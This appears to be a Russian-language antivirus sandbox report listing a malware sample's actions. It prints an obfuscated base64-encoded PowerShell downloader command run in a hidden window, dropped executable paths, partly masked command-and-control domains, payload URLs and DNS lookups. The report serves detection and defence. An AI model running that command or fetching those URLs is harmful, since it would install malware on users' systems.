Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABKADQAYgAzAGkAeQAzAD0AKAAnAE8ANQAnACsAKAAnAHgAJwArACcAOQB2AGMAJwApACsAJwBtACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBQAFIAbw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1980
- %TEMP%\1415147.cvr
- %HOMEPATH%\aqfji3y\lfasg7a\muabjz6.exe
- %HOMEPATH%\aqfji3y\lfasg7a\muabjz6.exe
- 'li#####paganda.com.br':80
- 'li#####paganda.com.br':443
- 'cp#.com.bd':80
- 'we######nslosangeles.com':80
- 'xi#o.tv':443
- 'cs.##acg.xyz':443
- http://www.li#####paganda.com.br/ALFA_DATA/TYxyEymux/
- http://www.cp#.com.bd/wp-admin/08avd9/
- http://we######nslosangeles.com/a/1lRI7/
- 'li#####paganda.com.br':443
- 'xi#o.tv':443
- 'cs.##acg.xyz':443
- DNS ASK li#####paganda.com.br
- DNS ASK cp#.com.bd
- DNS ASK we######nslosangeles.com
- DNS ASK xi#o.tv
- DNS ASK cs.##acg.xyz
- DNS ASK th###ncept.am
- DNS ASK ch###ekl.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABKADQAYgAzAGkAeQAzAD0AKAAnAE8ANQAnACsAKAAnAHgAJwArACcAOQB2AGMAJwApACsAJwBtACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBQAFIAbw...' (со скрытым окном)